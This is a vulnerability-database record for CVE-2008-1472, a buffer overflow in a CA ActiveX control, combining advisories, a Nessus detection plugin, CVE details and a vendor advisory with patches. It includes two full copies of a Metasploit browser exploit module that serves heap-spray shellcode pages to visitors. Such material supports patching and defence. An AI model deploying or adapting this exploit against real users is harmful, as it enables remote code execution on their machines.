{"checkpoint_advisories": [{"lastseen": "2021-11-05T00:13:01", "description": "A vulnerability was reported in multiple Computer Associates (CA) products. These products are all intended for enhancing corporate and client security. The vulnerability is due to insufficient boundary checking in the parameters passed to the affected ActiveX control installed by the products listed below. To exploit the vulnerability, the attacker needs to entice the target user to visit a malicious web page. Successful exploitation would cause buffer overflow that may allow for arbitrary code execution.", "cvss3": {}, "published": "2008-10-31T00:00:00", "type": "checkpoint_advisories", "title": "Update Protection against CA Multiple Products ActiveX Control Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1472"], "modified": "2008-01-01T00:00:00", "id": "CPAI-2008-232", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:45:48", "description": "Computer Associates (CA) provides a group of security and management products for enterprise as well as individual clients. A buffer overflow vulnerability was reported in CA multiple products. The vulnerability is due to boundary errors in the CA products ActiveX control while handling crafted parameters passed to the function AddColumn. To trigger this issue, an attacker may create a malicious web page that will exploit this vulnerability. Successful exploitation may allow execution of arbitrary code on the vulnerable system.", "cvss3": {}, "published": "2008-06-22T00:00:00", "type": "checkpoint_advisories", "title": "CA Products ActiveX Control ListCtrl AddColumn Buffer Overflow (CVE-2008-1472)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1472"], "modified": "2008-06-22T00:00:00", "id": "CPAI-2008-087", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-10-16T02:54:06", "description": "The version of the ListCtrl ActiveX control included with various CA products and installed on the remote host contains a buffer overflow that can be triggered by a long argument to the 'AddColumn' method.\nIf an attacker can trick a user on the affected host into visiting a specially- crafted web page, this method could be leveraged to execute arbitrary code on the affected system subject to the user's privileges.", "cvss3": {"score": null, "vector": null}, "published": "2008-04-03T00:00:00", "type": "nessus", "title": "CA BrightStor ARCserve Backup ListCtrl ActiveX (ListCtrl.ocx) AddColumn() Method Overflow", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-1472"], "modified": "2018-11-15T00:00:00", "cpe": [], "id": "DSM_LISTCTRL_ACTIVEX_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/31731", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(31731);\n script_version(\"1.26\");\n\n script_cve_id(\"CVE-2008-1472\");\n script_bugtraq_id(28268);\n script_xref(name:\"EDB-ID\", value:\"5264\");\n script_xref(name:\"Secunia\", value:\"29408\");\n\n script_name(english:\"CA BrightStor ARCserve Backup ListCtrl ActiveX (ListCtrl.ocx) AddColumn() Method Overflow\");\n script_summary(english:\"Checks for ListCtrl control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by a\nbuffer overflow vulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of the ListCtrl ActiveX control included with various\nCA products and installed on the remote host contains a buffer overflow\nthat can be triggered by a long argument to the 'AddColumn' method.\nIf an attacker can trick a user on the affected host into visiting a\nspecially- crafted web page, this method could be leveraged to execute\narbitrary code on the affected system subject to the user's privileges.\" );\n # https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={78E04232-908A-43C7-B7D8-B05E29FCA2E2}\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f912eb8d\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2008/Mar/563\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as described in the vendor advisory\nreferenced above.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/04/03\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = \"{BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3}\";\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n ver = activex_get_fileversion(clsid:clsid);\n\n if (ver =~ \"^11\\.1\") fix = \"11.1.8124.0\";\n else if (ver =~ \"^11\\.2\") fix = \"11.2.1000.16\";\n else fix = \"\";\n\n if (ver && fix && activex_check_fileversion(clsid:clsid, fix:fix) == TRUE)\n {\n report = NULL;\n\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:16", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-1472"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82950", "href": "https://packetstormsecurity.com/files/82950/CA-BrightStor-ARCserve-Backup-AddColumn-ActiveX-Buffer-Overflow.html", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow', \n'Description' => %q{ \nThe CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based \nbuffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker \ncould overflow a buffer and execute arbitrary code on the system. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'dean <dean [at] zerodaysolutions [dot] com>' ], \n'Version' => '$Revision', \n'References' => \n[ \n[ 'CVE', '2008-1472' ], \n[ 'OSVDB', '43214' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP2-SP3 IE 6.0/7.0', { 'Ret' => 0x0A0A0A0A } ] \n], \n'DisclosureDate' => 'March 16 2008', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Create some nops. \nnops = Rex::Text.to_unescape(make_nops(4)) \n \n# Set the return. \nret = Rex::Text.to_unescape([target.ret].pack('V')) \n \n# Randomize the javascript variable names. \nvname = rand_text_alpha(rand(30) + 1) \nvar_i = rand_text_alpha(rand(5) + 1) \nrand1 = rand_text_alpha(rand(100) + 1) \nrand2 = rand_text_alpha(rand(100) + 1) \nrand3 = rand_text_alpha(rand(100) + 1) \nrand4 = rand_text_alpha(rand(100) + 1) \nrand5 = rand_text_alpha(rand(100) + 1) \nrand6 = rand_text_alpha(rand(100) + 1) \nrand7 = rand_text_alpha(rand(100) + 1) \n \ncontent = %Q| \n<html> \n<object id=\"#{vname}\" classid=\"clsid:BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3\"></object> \n<script> \n \nvar #{rand1} = unescape(\"#{shellcode}\"); \nvar #{rand2} = 0x0A0A0A0A; \nvar #{rand3} = 0x400000; \nvar #{rand4} = (#{rand2} - #{rand3}) / #{rand3}; \nvar #{rand5} = unescape(\"#{ret}\"); \nvar #{rand6} = 128; \n \nwhile((#{rand5}.length * 2) < #{rand3}) #{rand5} += #{rand5}; \n#{rand5} = #{rand5}.substring(0, #{rand3} - #{rand1}.length); \n#{rand8} = new Array(); \nfor(#{var_i} = 0; #{var_i} < #{rand4}; #{var_i}++) #{rand7}[#{var_i}] = #{rand5} + #{rand1}; \nwhile(#{rand5}.length < (#{rand6} * 2)) #{rand5} += #{rand5}; \n#{rand5} = #{rand5}.substring(0, #{rand6}); \n \n#{vname}.AddColumn(#{rand5}, 1); \n</script> \n</html> \n| \n \ncontent = Rex::Text.randomize_space(content) \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82950/ca_brightstor_addcolumn.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T11:56:38", "description": "Stack-based buffer overflow in the ListCtrl ActiveX Control (ListCtrl.ocx), as used in multiple CA products including BrightStor ARCserve Backup R11.5, Desktop Management Suite r11.1 through r11.2, and Unicenter products r11.1 through r11.2, allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a long argument to the AddColumn method.", "cvss3": {}, "published": "2008-03-24T22:44:00", "type": "cve", "title": "CVE-2008-1472", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1472"], "modified": "2018-10-11T20:34:00", "cpe": ["cpe:/a:computer_associates:desktop_management_suite:r11.2", "cpe:/a:computer_associates:unicenter_dsm_r11_list_control_atx:11.2.3.1895", "cpe:/a:computer_associates:desktop_management_suite:r11.1", "cpe:/a:unicenter:software_delivery:r11.2", "cpe:/a:unicenter:desktop_management_bundle:r11.2", "cpe:/a:unicenter:software_delivery:r11.1", "cpe:/a:unicenter:remote_control:r11.2", "cpe:/a:computer_associates:brightstor_arcserve_backup_laptops_desktops:11.5", "cpe:/a:unicenter:remote_control:r11.1", "cpe:/a:unicenter:asset_management:r11.1", "cpe:/a:unicenter:desktop_management_bundle:r11.1", "cpe:/a:unicenter:asset_management:r11.2"], "id": "CVE-2008-1472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:unicenter:software_delivery:r11.2:a:*:*:*:*:*:*", "cpe:2.3:a:unicenter:asset_management:r11.2:*:*:*:*:*:*:*", "cpe:2.3:a:computer_associates:desktop_management_suite:r11.1:ga:*:*:*:*:*:*", "cpe:2.3:a:unicenter:remote_control:r11.2:c1:*:*:*:*:*:*", "cpe:2.3:a:unicenter:software_delivery:r11.2:c1:*:*:*:*:*:*", "cpe:2.3:a:computer_associates:desktop_management_suite:r11.2:*:*:*:*:*:*:*", "cpe:2.3:a:unicenter:software_delivery:r11.1:c1:*:*:*:*:*:*", "cpe:2.3:a:unicenter:asset_management:r11.1:ga:*:*:*:*:*:*", "cpe:2.3:a:unicenter:asset_management:r11.2:a:*:*:*:*:*:*", "cpe:2.3:a:unicenter:remote_control:r11.1:c1:*:*:*:*:*:*", "cpe:2.3:a:computer_associates:unicenter_dsm_r11_list_control_atx:11.2.3.1895:*:*:*:*:*:*:*", "cpe:2.3:a:unicenter:desktop_management_bundle:r11.1:c1:*:*:*:*:*:*", "cpe:2.3:a:unicenter:remote_control:r11.1:ga:*:*:*:*:*:*", "cpe:2.3:a:computer_associates:brightstor_arcserve_backup_laptops_desktops:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:computer_associates:desktop_management_suite:r11.1:a:*:*:*:*:*:*", "cpe:2.3:a:unicenter:remote_control:r11.2:*:*:*:*:*:*:*", "cpe:2.3:a:unicenter:asset_management:r11.2:c1:*:*:*:*:*:*", "cpe:2.3:a:unicenter:desktop_management_bundle:r11.1:a:*:*:*:*:*:*", "cpe:2.3:a:unicenter:software_delivery:r11.1:a:*:*:*:*:*:*", "cpe:2.3:a:unicenter:asset_management:r11.1:a:*:*:*:*:*:*", "cpe:2.3:a:unicenter:asset_management:r11.1:c1:*:*:*:*:*:*", "cpe:2.3:a:unicenter:desktop_management_bundle:r11.2:c1:*:*:*:*:*:*", "cpe:2.3:a:unicenter:remote_control:r11.1:a:*:*:*:*:*:*", "cpe:2.3:a:unicenter:desktop_management_bundle:r11.1:ga:*:*:*:*:*:*", "cpe:2.3:a:unicenter:desktop_management_bundle:r11.2:*:*:*:*:*:*:*", "cpe:2.3:a:unicenter:desktop_management_bundle:r11.2:a:*:*:*:*:*:*", "cpe:2.3:a:unicenter:software_delivery:r11.2:*:*:*:*:*:*:*", "cpe:2.3:a:unicenter:software_delivery:r11.1:ga:*:*:*:*:*:*", "cpe:2.3:a:unicenter:remote_control:r11.2:a:*:*:*:*:*:*", "cpe:2.3:a:computer_associates:desktop_management_suite:r11.1:c1:*:*:*:*:*:*"]}], "d2": [{"lastseen": "2021-07-28T14:32:22", "description": "**Name**| d2sec_calistctrl \n---|--- \n**CVE**| CVE-2008-1472 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| CA BrightStor ListCtrl ActiveX Stack Overflow \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2008-03-24T22:44:00", "title": "DSquare Exploit Pack: D2SEC_CALISTCTRL", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1472"], "modified": "2008-03-24T22:44:00", "id": "D2SEC_CALISTCTRL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_calistctrl", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-07T00:11:07", "description": "The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker could overflow a buffer and execute arbitrary code on the system.\n", "edition": 2, "cvss3": {}, "published": "2009-01-04T21:51:04", "type": "metasploit", "title": "CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1472"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/CA_BRIGHTSTOR_ADDCOLUMN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow',\n 'Description' => %q{\n The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based\n buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker\n could overflow a buffer and execute arbitrary code on the system.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'dean <dean[at]zerodaysolutions.com>' ],\n 'References' =>\n [\n [ 'CVE', '2008-1472' ],\n [ 'OSVDB', '43214' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2-SP3 IE 6.0/7.0', { 'Ret' => 0x0A0A0A0A } ]\n ],\n 'DisclosureDate' => 'Mar 16 2008',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Create some nops.\n nops = Rex::Text.to_unescape(make_nops(4))\n\n # Set the return.\n ret = Rex::Text.to_unescape([target.ret].pack('V'))\n\n # Randomize the javascript variable names.\n vname = rand_text_alpha(rand(30) + 1)\n var_i = rand_text_alpha(rand(5) + 1)\n rand1 = rand_text_alpha(rand(100) + 1)\n rand2 = rand_text_alpha(rand(100) + 1)\n rand3 = rand_text_alpha(rand(100) + 1)\n rand4 = rand_text_alpha(rand(100) + 1)\n rand5 = rand_text_alpha(rand(100) + 1)\n rand6 = rand_text_alpha(rand(100) + 1)\n rand7 = rand_text_alpha(rand(100) + 1)\n\n content = %Q|\n <html>\n <object id=\"#{vname}\" classid=\"clsid:BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3\"></object>\n <script>\n\n var #{rand1} = unescape(\"#{shellcode}\");\n var #{rand2} = 0x0A0A0A0A;\n var #{rand3} = 0x400000;\n var #{rand4} = (#{rand2} - #{rand3}) / #{rand3};\n var #{rand5} = unescape(\"#{ret}\");\n var #{rand6} = 128;\n\n while((#{rand5}.length * 2) < #{rand3}) #{rand5} += #{rand5};\n #{rand5} = #{rand5}.substring(0, #{rand3} - #{rand1}.length);\n #{rand7} = new Array();\n for(#{var_i} = 0; #{var_i} < #{rand4}; #{var_i}++) #{rand7}[#{var_i}] = #{rand5} + #{rand1};\n while(#{rand5}.length < (#{rand6} * 2)) #{rand5} += #{rand5};\n #{rand5} = #{rand5}.substring(0, #{rand6});\n\n #{vname}.AddColumn(#{rand5}, 1);\n </script>\n </html>\n |\n\n content = Rex::Text.randomize_space(content)\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ca_brightstor_addcolumn.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:25", "description": "\r\nTitle: CA Multiple Products DSM ListCtrl ActiveX Control Buffer \r\nOverflow Vulnerability\r\n\r\nCVE: CVE-2008-1472\r\n\r\nCA Advisory Date: 2008-03-28\r\n\r\nReported By: Exploit code posted at milw0rm.com\r\n\r\nImpact: A remote attacker can cause a denial of service or execute \r\narbitrary code.\r\n\r\nSummary: CA products that implement the DSM ListCtrl ActiveX \r\ncontrol are vulnerable to a buffer overflow condition that can \r\nallow a remote attacker to cause a denial of service or execute \r\narbitrary code with the privileges of the user running the web \r\nbrowser. The vulnerability, CVE-2008-1472, is due to insufficient \r\nbounds checking on the ListCtrl AddColumn function.\r\n\r\nMitigating Factors: For BrightStor ARCserve Backup for Laptops & \r\nDesktops, only the server installation is affected. Client \r\ninstallations are not affected. For CA Desktop Management Suite, \r\nUnicenter Desktop Management Bundle, Unicenter Asset Management, \r\nUnicenter Software Delivery and Unicenter Remote Control, only the \r\nManagers and DSM Explorers are affected. Scalability Servers and \r\nAgents are not affected. \r\n\r\nSeverity: CA has given this vulnerability a maximum risk rating \r\nof High.\r\n\r\nAffected Products:\r\nBrightStor ARCServe Backup for Laptops and Desktops r11.5\r\nCA Desktop Management Suite r11.2 C1\r\nCA Desktop Management Suite r11.2a\r\nCA Desktop Management Suite r11.2\r\nCA Desktop Management Suite r11.1 (GA, a, C1)\r\nUnicenter Desktop Management Bundle r11.2 C1\r\nUnicenter Desktop Management Bundle r11.2a\r\nUnicenter Desktop Management Bundle r11.2\r\nUnicenter Desktop Management Bundle r11.1 (GA, a, C1)\r\nUnicenter Asset Management r11.2 C1\r\nUnicenter Asset Management r11.2a\r\nUnicenter Asset Management r11.2\r\nUnicenter Asset Management r11.1 (GA, a, C1)\r\nUnicenter Software Delivery r11.2 C1\r\nUnicenter Software Delivery r11.2a\r\nUnicenter Software Delivery r11.2\r\nUnicenter Software Delivery r11.1 (GA, a, C1)\r\nUnicenter Remote Control r11.2 C1\r\nUnicenter Remote Control r11.2a\r\nUnicenter Remote Control r11.2\r\nUnicenter Remote Control r11.1 (GA, a, C1)\r\n\r\nAffected Platforms:\r\nWindows\r\n\r\nStatus and Recommendation:\r\nCA has provided the following updates to address the \r\nvulnerabilities.\r\n\r\nBrightStor ARCserve Backup for Laptops and Desktops r11.5:\r\nQO96102\r\n\r\nCA Desktop Management Suite for Windows r11.1 (GA, a, C1),\r\nUnicenter Desktop Management Bundle r11.1 (GA, a, C1),\r\nUnicenter Asset Management r11.1 (GA, a, C1),\r\nUnicenter Software Delivery r11.1 (GA, a, C1),\r\nUnicenter Remote Control r11.1 (GA, a, C1):\r\nQO96088\r\n\r\nCA Desktop Management Suite for Windows r11.2a,\r\nUnicenter Desktop Management Bundle r11.2a,\r\nUnicenter Asset Management r11.2a,\r\nUnicenter Software Delivery r11.2a,\r\nUnicenter Remote Control r11.2a:\r\nQO96092\r\n\r\nCA Desktop Management Suite for Windows r11.2,\r\nUnicenter Desktop Management Bundle r11.2,\r\nUnicenter Asset Management r11.2,\r\nUnicenter Software Delivery r11.2,\r\nUnicenter Remote Control r11.2:\r\nQO96091\r\n\r\nCA Desktop Management Suite for Windows r11.2 C1,\r\nUnicenter Desktop Management Bundle r11.2 C1,\r\nUnicenter Asset Management r11.2 C1,\r\nUnicenter Software Delivery r11.2 C1,\r\nUnicenter Remote Control r11.2 C1:\r\nQO96090\r\n\r\nHow to determine if you are affected:\r\nFor products on Windows:\r\n 1. Using Windows Explorer, locate the file "ListCtrl.ocx". By \r\n default, the file is in the "C:\Program Files\CA\DSM\bin\" \r\n directory.\r\n 2. Right click on the file and select Properties.\r\n 3. Select the Version tab.\r\n 4. If the file version is earlier than indicated in the below \r\n table, the installation is vulnerable.\r\n\r\nProduct:\r\n CA Desktop Management Suite for Windows r11.1 (GA, a, C1),\r\n Unicenter Desktop Management Bundle r11.1 (GA, a, C1),\r\n Unicenter Asset Management r11.1 (GA, a, C1),\r\n Unicenter Software Delivery r11.1 (GA, a, C1),\r\n Unicenter Remote Control r11.1 (GA, a, C1)\r\nFile Name: ListCtrl.ocx\r\nFile Version: 11.1.8124.0\r\n\r\nProduct:\r\n CA Desktop Management Suite for Windows r11.2,\r\n Unicenter Desktop Management Bundle r11.2,\r\n Unicenter Asset Management r11.2,\r\n Unicenter Software Delivery r11.2,\r\n Unicenter Remote Control r11.2 \r\nFile Name: ListCtrl.ocx \r\nFile Version: 11.2.1000.16\r\n\r\nProduct:\r\n CA Desktop Management Suite for Windows r11.2a,\r\n Unicenter Desktop Management Bundle r11.2a,\r\n Unicenter Asset Management r11.2a,\r\n Unicenter Software Delivery r11.2a,\r\n Unicenter Remote Control r11.2a \r\nFile Name: ListCtrl.ocx \r\nFile Version: 11.2.1000.16\r\n\r\nProduct:\r\n CA Desktop Management Suite for Windows r11.2 C1,\r\n Unicenter Desktop Management Bundle r11.2 C1,\r\n Unicenter Asset Management r11.2 C1,\r\n Unicenter Software Delivery r11.2 C1,\r\n Unicenter Remote Control r11.2 C1,\r\n BrightStor ARCserve Backup for Laptops and Desktops r11.5 \r\nFile Name: ListCtrl.ocx \r\nFile Version: 11.2.1000.16\r\n\r\nWorkaround:\r\nAs a temporary workaround solution, disable the ListCtrl ActiveX \r\ncontrol in the registry by setting the kill bit on CLSID \r\n{BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3}. Disabling the control may \r\nprevent the GUI from functioning correctly. Refer to Microsoft KB \r\narticle 240797 <http://support.microsoft.com/kb/240797> for \r\ninformation on how to disable an ActiveX control.\r\n\r\nReferences (URLs may wrap):\r\nCA SupportConnect:\r\nhttp://support.ca.com/\r\nCA products using the DSM ListCtrl ActiveX Control Security Notice\r\nhttps://support.ca.com/irj/portal/anonymous/phpdocs?filePath=0/common/DSM_ListCtr_secnot.html\r\nSolution Document Reference APARs:\r\nQO96102, QO96088, QO96092, QO96091, QO96090\r\nCA Security Response Blog posting:\r\nCA Multiple Products DSM ListCtrl ActiveX Control Buffer Overflow \r\nVulnerability\r\nhttp://community.ca.com/blogs/casecurityresponseblog/archive/2008/3/28.aspx\r\nReported By: \r\nExploit code posted at milw0rm.com\r\nCVE References:\r\nCVE-2008-1472 - DSM ListCtrl ActiveX control AddColumn buffer overflow\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1472\r\nOSVDB References: Pending\r\nhttp://osvdb.org/\r\n\r\nChangelog for this advisory:\r\nv1.0 - Initial Release\r\n\r\nCustomers who require additional information should contact CA\r\nTechnical Support at http://support.ca.com.\r\n\r\nFor technical questions or comments related to this advisory, \r\nplease send email to vuln AT ca DOT com.\r\n\r\nIf you discover a vulnerability in CA products, please email your\r\nfindings to vuln AT ca DOT com.\r\n\r\n\r\nRegards,\r\nKen Williams ; 0xE2941985\r\nDirector, CA Vulnerability Research\r\n\r\nCA, 1 CA Plaza, Islandia, NY 11749\r\n \r\nContact http://www.ca.com/us/contact/\r\nLegal Notice http://www.ca.com/us/legal/\r\nPrivacy Policy http://www.ca.com/us/privacy/\r\nCopyright (c) 2008 CA. All rights reserved.", "edition": 1, "cvss3": {}, "published": "2008-03-30T00:00:00", "title": "CA Multiple Products DSM ListCtrl ActiveX Control Buffer Overflow Vulnerability", "type": "securityvulns", "bulletinFamily": "software", 